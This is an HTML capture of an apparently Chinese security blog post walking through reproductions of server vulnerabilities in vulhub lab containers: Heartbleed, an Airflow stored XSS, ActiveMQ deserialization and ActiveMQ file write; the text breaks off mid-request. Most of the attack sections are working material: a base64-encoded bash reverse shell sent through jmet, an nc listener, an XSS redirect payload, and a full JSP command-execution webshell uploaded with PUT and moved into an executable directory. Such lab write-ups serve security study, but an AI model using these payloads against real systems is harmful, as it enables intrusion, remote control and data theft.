--00000000000000000019 Content-Type: text/html; charset=utf-8 Content-Range: bytes -605-611/612 ’‰Ô`b`RY:‡Ô`r«\\me\"59526062-264\" KEY: http://127.0.0.1:8081/  本文链接:漏洞复现 | Atmet (oopsdc.tk)\n文章许可:本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。\n ","wordCount":"1125","inLanguage":"en","datePublished":"2021-06-17T09:03:30+08:00","dateModified":"2021-06-17T09:03:30+08:00","author":{"@type":"Person","name":"DaChui"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://oopsdc.tk/post/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"},"publisher":{"@type":"Organization","name":"Atmet","logo":{"@type":"ImageObject","url":"https://oopsdc.tk/%3Clink%20/%20abs%20url%3E"}}}</script></head><body id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add('dark'):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove('dark'):window.matchMedia('(prefers-color-scheme: dark)').matches&&document.body.classList.add('dark')</script><noscript><style type=text/css>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:#1d1e20;--entry:#2e2e33;--primary:rgba(255, 255, 255, 0.84);--secondary:rgba(255, 255, 255, 0.56);--tertiary:rgba(255, 255, 255, 0.16);--content:rgba(255, 255, 255, 0.74);--hljs-bg:#2e2e33;--code-bg:#37383e;--border:#333}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><header class=header><nav class=nav><div class=logo><a href=https://oopsdc.tk/ accesskey=h title="Home (Alt + H)">Home</a>
<span class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></span></div><ul id=menu onscroll=menu_on_scroll()><li><a href=https://oopsdc.tk/archives/ title=Archives><span>Archives</span></a></li><li><a href=https://oopsdc.tk/links/ title=Links><span>Links</span></a></li><li><a href=https://oopsdc.tk/search/ title="Search (Alt + /)" accesskey=/><span>Search</span></a></li><li><a href=https://oopsdc.tk/tags/ title=Tags><span>Tags</span></a></li></ul></nav></header><main class=main><article class=post-single><header class=post-header><div class=breadcrumbs><a href=https://oopsdc.tk/>Home</a>&nbsp;»&nbsp;<a href=https://oopsdc.tk/post/>Posts</a></div><h1 class=post-title>服务器应用漏洞</h1><div class=post-meta>June 17, 2021&nbsp;·&nbsp;6 min&nbsp;·&nbsp;DaChui</div></header><div class=toc><details><summary accesskey=c title="(Alt + C)"><div class=details>Table of Contents</div></summary><div class=inner><ul><li><a href=#%e6%9c%8d%e5%8a%a1%e5%99%a8%e5%ba%94%e7%94%a8%e6%bc%8f%e6%b4%9e aria-label=服务器应用漏洞>服务器应用漏洞</a><ul><li><a href=#openssl aria-label=OpenSSL>OpenSSL</a><ul><li><a href=#openssl-%e5%bf%83%e8%84%8f%e6%bb%b4%e8%a1%80%e6%bc%8f%e6%b4%9e-cve-2014-0160 aria-label="OpenSSL 心脏滴血漏洞 CVE-2014-0160">OpenSSL 心脏滴血漏洞 CVE-2014-0160</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0 aria-label=漏洞复现>漏洞复现</a></li></ul></li></ul></li></ul></li><li><a href=#web%e6%bc%8f%e6%b4%9e aria-label=Web漏洞>Web漏洞</a><ul><li><a href=#apache aria-label=Apache>Apache</a><ul><li><a href=#airflow-%e5%ad%98%e5%82%a8%e5%9e%8bxss aria-label="Airflow 存储型XSS">Airflow 存储型XSS</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-1 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-1 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-1 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-1 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#activemq-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e-cve-2015-5254 aria-label="ActiveMQ 反序列化漏洞 CVE-2015-5254">ActiveMQ 反序列化漏洞 CVE-2015-5254</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-2 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-2 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-2 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-2 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#activemq-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e5%86%99%e5%85%a5%e6%bc%8f%e6%b4%9e-cve-2016-3088 aria-label="ActiveMQ 任意文件写入漏洞 CVE-2016-3088">ActiveMQ 任意文件写入漏洞 CVE-2016-3088</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-3 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-3 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-3 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-3 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#ddos-cve-2007-6750 aria-label="DDOS CVE-2007-6750">DDOS CVE-2007-6750</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-4 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-4 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-4 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-4 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#httpd-%e6%8d%a2%e8%a1%8c%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e-cve-2017-15715 aria-label="HTTPd 换行解析漏洞 CVE-2017-15715">HTTPd 换行解析漏洞 CVE-2017-15715</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-5 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-5 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-5 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-5 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#flink-%e7%9b%ae%e5%bd%95%e9%81%8d%e5%8e%86%e6%bc%8f%e6%b4%9e-cve-2020-17519 aria-label="Flink 目录遍历漏洞 CVE-2020-17519">Flink 目录遍历漏洞 CVE-2020-17519</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-6 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-6 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-6 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-6 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#%e5%90%8e%e9%97%a8%e7%bb%b4%e6%8c%81 aria-label=后门维持>后门维持</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-7 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-7 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-7 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-7 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#mod_jk-%e8%ae%bf%e9%97%ae%e6%8e%a7%e5%88%b6%e6%9d%83%e9%99%90%e7%bb%95%e8%bf%87-cve-2018-11759 aria-label="Mod_jk 访问控制权限绕过 CVE-2018-11759">Mod_jk 访问控制权限绕过 CVE-2018-11759</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-8 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-8 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-8 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-8 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#kylin-console-%e6%8e%a7%e5%88%b6%e5%8f%b0%e5%bc%b1%e5%8f%a3%e4%bb%a4 aria-label="Kylin Console 控制台弱口令">Kylin Console 控制台弱口令</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-9 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-9 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-9 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-9 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#kylin-%e6%9c%aa%e6%8e%88%e6%9d%83%e9%85%8d%e7%bd%ae%e6%b3%84%e9%9c%b2-cve-2020-13937 aria-label="Kylin 未授权配置泄露 CVE-2020-13937">Kylin 未授权配置泄露 CVE-2020-13937</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-10 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-10 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-10 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-10 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#rce-cve-2017-12615 aria-label="RCE CVE-2017-12615">RCE CVE-2017-12615</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-11 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-11 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-11 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-11 aria-label=漏洞复现>漏洞复现</a></li></ul></li><li><a href=#zookeeper-%e6%9c%aa%e6%8e%88%e6%9d%83%e8%ae%bf%e9%97%ae%e6%bc%8f%e6%b4%9e-cve-2014-085 aria-label="Zookeeper 未授权访问漏洞 CVE-2014-085">Zookeeper 未授权访问漏洞 CVE-2014-085</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-12 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-12 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-12 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-12 aria-label=漏洞复现>漏洞复现</a></li></ul></li></ul></li><li><a href=#jboss aria-label=JBoss>JBoss</a><ul><li><a href=#jboss-4x-jbossmq-jms-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e-cve-2017-7504 aria-label="JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504">JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-13 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-13 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-13 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-13 aria-label=漏洞复现>漏洞复现</a></li></ul></li></ul></li><li><a href=#nginx aria-label=Nginx>Nginx</a><ul><li><a href=#nginx-%e8%b6%8a%e7%95%8c%e8%af%bb%e5%8f%96%e7%bc%93%e5%ad%98%e6%bc%8f%e6%b4%9e-cve-2017-7529 aria-label="Nginx 越界读取缓存漏洞 CVE-2017-7529">Nginx 越界读取缓存漏洞 CVE-2017-7529</a><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e6%8f%8f%e8%bf%b0-14 aria-label=漏洞描述>漏洞描述</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac-14 aria-label=影响版本>影响版本</a></li><li><a href=#%e5%a4%8d%e7%8e%b0%e6%80%9d%e8%b7%af-14 aria-label=复现思路>复现思路</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0-14 aria-label=漏洞复现>漏洞复现</a></li></ul></li></ul></li></ul></li></ul></div></details></div><div class=post-content><h1 id=服务器应用漏洞>服务器应用漏洞<a hidden class=anchor aria-hidden=true href=#服务器应用漏洞>#</a></h1><h2 id=openssl>OpenSSL<a hidden class=anchor aria-hidden=true href=#openssl>#</a></h2><h3 id=openssl-心脏滴血漏洞-cve-2014-0160>OpenSSL 心脏滴血漏洞 CVE-2014-0160<a hidden class=anchor aria-hidden=true href=#openssl-心脏滴血漏洞-cve-2014-0160>#</a></h3><h4 id=漏洞描述>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述>#</a></h4><p>2014年4月7日，<code>OpenSSL</code>发布安全公告，在<code>OpenSSL 1.0.1 ~ 1.0.1f Beta1</code>版本中存在漏洞，漏洞名为<code>HeartBleed</code>。其中<code>Heart</code>是指该漏洞位于心跳协议上，<code>Bleed</code>是因为该漏洞会造成数据泄露。即<code>HeartBleed</code>是在心跳协议上的一个数据泄露漏洞，<code>OpenSSL</code>库中用到了该心跳协议。</p><h4 id=影响版本>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本>#</a></h4><p><code>OpenSSL 1.0.1</code>、<code>1.0.1a</code>、<code>1.0.1b</code>、<code>1.0.1c</code>、<code>1.0.1d</code>、<code>1.0.1e</code>、<code>1.0.1f</code>、<code>Beta 1 of OpenSSL 1.0.2</code>等。</p><h4 id=复现思路>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路>#</a></h4><h4 id=漏洞复现>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/vulhub/vulhub.git
cd vulhub/openssl/heartbleed
docker-compose up -d
</code></pre></div><p>使用msf对目标进行攻击:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>msfconsole
set RHOST &lt;ip&gt;
set verbose true
run
</code></pre></div><h1 id=web漏洞>Web漏洞<a hidden class=anchor aria-hidden=true href=#web漏洞>#</a></h1><h2 id=apache>Apache<a hidden class=anchor aria-hidden=true href=#apache>#</a></h2><h3 id=airflow-存储型xss>Airflow 存储型XSS<a hidden class=anchor aria-hidden=true href=#airflow-存储型xss>#</a></h3><h4 id=漏洞描述-1>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-1>#</a></h4><p><code>Apache Airflow 1.10.2</code>及之前版本中的<code>airflow webserver</code>服务存在跨站脚本漏洞，该漏洞源于<code>WEB应用</code>缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。</p><h4 id=影响版本-1>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-1>#</a></h4><p><code>Apache Airflow 1.10.3</code>以下版本。</p><h4 id=复现思路-1>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-1>#</a></h4><h4 id=漏洞复现-1>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-1>#</a></h4><p>访问<code>/admin/dagrun/</code>(默认不需要密码)</p><p>创建一个项目，输入<code>ID</code>后点击保存，返回列表，点击<code>running</code>字样，发现能够输入<code>HTML</code>代码，例:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>script</span>&gt;<span style=color:#ae81ff>_</span><span style=color:#a6e22e>a</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;https://www.baidu.com&#34;</span>&lt;/<span style=color:#f92672>script</span>&gt;
&lt;<span style=color:#f92672>script</span>&gt;document.<span style=color:#a6e22e>location</span><span style=color:#f92672>=</span><span style=color:#ae81ff>_</span><span style=color:#a6e22e>a</span>&lt;/<span style=color:#f92672>script</span>&gt; 
</code></pre></div><p>能直接造成存储型<code>XSS</code>。</p><h3 id=activemq-反序列化漏洞-cve-2015-5254>ActiveMQ 反序列化漏洞 CVE-2015-5254<a hidden class=anchor aria-hidden=true href=#activemq-反序列化漏洞-cve-2015-5254>#</a></h3><h4 id=漏洞描述-2>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-2>#</a></h4><p><code>Apache ActiveMQ</code>是<code>Apache</code>软件经济会研发的一套开源消息中间件，支持<code>Java</code>消息服务、集群、<code>Spring Framework</code>等。<code>Apache ActiveMQ 5.13.0</code>之前版本，即<code>5.x</code>版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化<code>Java消息服务(JMS) ObjectMessage</code>对象利用该漏洞执行任意代码。</p><h4 id=影响版本-2>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-2>#</a></h4><p><code>Apache ActiveMQ 5.13.0</code>之前的<code>5.x</code>版本。</p><h4 id=复现思路-2>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-2>#</a></h4><p>1.构造(可使用<code>ysoserial</code>)可执行命令的序列化对象。</p><p>2.作为一个消息，发送给目标61616端口。</p><p>3.访问web管理页面，读取消息，触发漏洞。</p><h4 id=漏洞复现-2>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-2>#</a></h4><p>使用<code>jmet</code>进行漏洞利用:<a href=https://github.com/ianxtianxt/jmet>https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar</a></p><blockquote><p>下载好之后在<code>jmet-0.1.0-all.jar</code>同级目录下创建<code>external</code>文件夹，避免出现文件夹不存在的报错。</p><p><code>jmet</code>的原理是使用jar包内置<code>ysoserial</code>生成Payload并发送，我们需要在<code>ysoserial</code>的<code>gadget</code>选择一个可使用的，如<code>ROME</code>。</p></blockquote><p>给目标<code>ActiveMQ</code>添加一个名为<code>event</code>的队列，点击事件为生成<code>/tmp/vuln</code>文件:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y <span style=color:#e6db74>&#34;touch /tmp/vuln&#34;</span> -Yp ROME &lt;ip&gt; <span style=color:#ae81ff>61616</span>

<span style=color:#75715e># 命令执行成功后回显如下</span>
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Connected with ID: ID:&lt;server-id&gt;
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Sent gadget <span style=color:#e6db74>&#34;ROME&#34;</span> with command: <span style=color:#e6db74>&#34;touch /tmp/vuln&#34;</span>
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Shutting down connection ID:&lt;server-id&gt;
</code></pre></div><p>访问<code>http://&lt;ip>:8161/admin/browse.jsp?JMSDestination=event</code>查看消息队列，访问页面需要登录，默认账密如下:</p><pre><code>admin/admin
</code></pre><p>点击页面<code>Message ID</code>下的<code>ID:server-id</code>字段触发文件创建命令，在受害端查看命令是否执行成功:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>ls /tmp
</code></pre></div><p>确认<code>/tmp/vuln</code>文件存在后即可进一步创建<code>反弹shell</code>。</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>bash -i &gt;&amp; /dev/tcp/&lt;ip&gt;/&lt;port&gt; 0&gt;&amp;<span style=color:#ae81ff>1</span>
<span style=color:#75715e># Base64编码</span>
YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx

bash -c <span style=color:#f92672>{</span>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx<span style=color:#f92672>}</span>|<span style=color:#f92672>{</span>base64,-d<span style=color:#f92672>}</span>|<span style=color:#f92672>{</span>bash,-i<span style=color:#f92672>}</span>

<span style=color:#75715e># 发送payload</span>
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y <span style=color:#e6db74>&#34;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx}|{base64,-d}|{bash,-i}&#34;</span> -Yp ROME &lt;ip&gt; <span style=color:#ae81ff>61616</span>

<span style=color:#75715e># INFO如下</span>
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Connected with ID: ID:&lt;server-id&gt;
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Sent gadget <span style=color:#e6db74>&#34;ROME&#34;</span> with command: <span style=color:#e6db74>&#34;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjExNi4yMzMuNzYvODg4MyAwPiYx}|{base64,-d}|{bash,-i}&#34;</span>
INFO d.c.j.t.JMSTarget <span style=color:#f92672>[</span>main<span style=color:#f92672>]</span> Shutting down connection ID:&lt;server-id&gt;
</code></pre></div><p>执行成功后，在监听端打开nc:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>nc -lvvp &lt;port&gt;
</code></pre></div><p>继续到<code>http://&lt;ip>:8161/admin/browse.jsp?JMSDestination=event</code>页面，点击字段触发<code>反弹shell</code>，成功连接。</p><h3 id=activemq-任意文件写入漏洞-cve-2016-3088>ActiveMQ 任意文件写入漏洞 CVE-2016-3088<a hidden class=anchor aria-hidden=true href=#activemq-任意文件写入漏洞-cve-2016-3088>#</a></h3><h4 id=漏洞描述-3>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-3>#</a></h4><p><code>ActiveMQ</code>中的<code>FileServer</code>服务允许用户通过<code>PUT方法</code>上传文件到指定目录。<code>FileServer</code>是存储文件的接口，支持写入文件(不解析<code>jsp</code>)，支持移动文件(<code>Move</code>)。</p><h4 id=影响版本-3>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-3>#</a></h4><p><code>ActiveMQ 5.x ~ 5.14.0</code>，但在<code>5.12.x ~ 5.13.x</code>版本中默认关闭<code>fileserver应用</code>(可在<code>conf/jetty.xml</code>中开启)。在5.14.0版本后彻底删除<code>fileserver</code>应用。</p><h4 id=复现思路-3>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-3>#</a></h4><p>1.PUT一个<code>webshell</code>到<code>fileserver目录</code></p><p>2.若不能执行则移动<code>webshell</code>到有权限目录</p><h4 id=漏洞复现-3>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-3>#</a></h4><p>访问<code>http://&lt;ip>:8161</code>，先登录，默认账密:</p><pre><code>admin/admin
</code></pre><p>使用<code>bp</code>构造如下请求包:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>PUT /fileserver/a.jsp HTTP/1.1
Host: &lt;<span style=color:#f92672>ip</span>&gt;:8881
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Fri, 13 Feb 2015 17:54:40 GMT
Connection: close
Content-Length: 349

<span style=color:#960050;background-color:#1e0010>&lt;</span>%@ page import=&#34;java.io.*&#34;%&gt;

<span style=color:#960050;background-color:#1e0010>&lt;</span>%

 out.print(&#34;Hello&lt;/<span style=color:#f92672>br</span>&gt;&#34;);

 String strcmd=request.getParameter(&#34;cmd&#34;);

 String line=null;

 Process p=Runtime.getRuntime().exec(strcmd);

 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 while((line=br.readLine())!=null){

  out.print(line+&#34;&lt;/<span style=color:#f92672>br</span>&gt;&#34;);

 }

%&gt;
</code></pre></div><p>响应包如下:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=color:#66d9ef>HTTP</span><span style=color:#f92672>/</span><span style=color:#ae81ff>1.1</span> <span style=color:#ae81ff>204</span> <span style=color:#a6e22e>No Content</span>
Connection<span style=color:#f92672>:</span> <span style=color:#ae81ff>close</span>
Server<span style=color:#f92672>:</span> <span style=color:#ae81ff>Jetty(8.1.16.v20140903)</span>
</code></pre></div><p>查看<code>webshell</code>能否执行:<code>http://&lt;ip>:8161/fileserver/a.jsp</code>，发现文件原样输出，没有被解析，当前目录没有执行权限。所以需要考虑移动文件至<code>/webapps/api</code>或<code>/webapps/admin</code>可解析<code>jsp</code>的目录下。</p><p>要移动文件，必然就需要路径，以下为两种获取路径的方法:</p><p>1.访问<code>http://&lt;ip>:8161admin/test/systemProperties.jsp</code></p><p>2.构造错误上传路径，爆出绝对路径，如:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>PUT /fileserver/a/b HTTP/1.1
</code></pre></div><p>实测<code>ActiveMQ 5.11.1</code>版本无法利用。</p><p>使用第一种方法，查看到文件路径为<code>root/apache-activemq-5.11.1</code>，下面把<code>a.jsp</code>文件移动到<code>/webapps/admin</code>目录下，构造包如下:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=color:#960050;background-color:#1e0010>MOVE /fileserver/a.jsp HTTP/1.1
</span><span style=color:#960050;background-color:#1e0010>Destination: file:///root/apache-activemq-5.11.1/webapps/admin/a.jsp
</span><span style=color:#960050;background-color:#1e0010>Host: &lt;ip&gt;:8161
</span><span style=color:#960050;background-color:#1e0010>Cache-Control: max-age=0
